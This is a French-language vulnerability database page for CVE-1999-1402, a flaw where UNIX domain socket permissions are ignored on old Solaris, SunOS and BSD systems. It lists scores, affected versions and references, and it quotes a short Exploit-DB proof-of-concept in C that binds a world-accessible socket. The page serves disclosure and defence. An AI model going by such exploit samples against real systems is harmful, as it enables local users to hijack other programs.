CVE-1999-1402 : Détail

CVE-1999-1402

0.04%V3
Local
2002-03-09
04h00 +00:00
2024-08-01
17h11 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The access permissions for a UNIX domain socket are ignored in Solaris 2.x and SunOS 4.x, and other BSD-based operating systems before 4.4, which could allow local users to connect to the socket and possibly disrupt or control the operations of the program using that socket.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 2.1 AV:L/AC:L/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19346

Date de publication : 1997-06-18 22h00 +00:00
Auteur : Thamer Al-Herbish
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/456/info Solaris 2.6 and many other unices/clones have a serious problem with their unix domain socket implementation that has it's origins in old BSD code. Any unix socket created by any application is set mode 4777. In Solaris versions 2.5 and earlier, the permissions were ignored completely. The applications are vulnerable to being connected to and written to by anyone. This could lead to a whole number of application-specific security compromises. Here is some sample code (by Nirva): #include <stdio.h> #include <stdlib.h> #include <sys/un.h> #include <sys/socket.h> main(int argc, char *argv[]) { struct sockaddr_un addr; int s; s = socket(AF_UNIX, SOCK_STREAM, 0); bzero(&addr, sizeof(addr)); addr.sun_family = AF_UNIX; strcpy(addr.sun_path, "/tmp/yoursocket"); if (bind(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("bind"); exit(1); } sleep(100); exit(0); }

Products Mentioned

Configuraton 0

Freebsd>>Freebsd >> Version 2.2.2

Freebsd>>Freebsd >> Version 2.2.3

Freebsd>>Freebsd >> Version 2.2.4

Freebsd>>Freebsd >> Version 2.2.5

Freebsd>>Freebsd >> Version 2.2.6

Freebsd>>Freebsd >> Version 2.2.8

Freebsd>>Freebsd >> Version 3.0

Freebsd>>Freebsd >> Version 3.1

Sun>>Solaris >> Version 2.5

    Sun>>Solaris >> Version 2.5.1

      Sun>>Solaris >> Version 2.5.1

        Sun>>Solaris >> Version 2.6

        Sun>>Sunos >> Version -

        Sun>>Sunos >> Version 4.0

        Sun>>Sunos >> Version 5.0

        Sun>>Sunos >> Version 5.5

        Sun>>Sunos >> Version 5.5.1

        Références

        http://www.securityfocus.com/bid/456
        Tags : vdb-entry, x_refsource_BID
        http://marc.info/?l=bugtraq&m=87602248718482&w=2
        Tags : mailing-list, x_refsource_BUGTRAQ
        http://marc.info/?l=bugtraq&m=87602167418317&w=2
        Tags : mailing-list, x_refsource_BUGTRAQ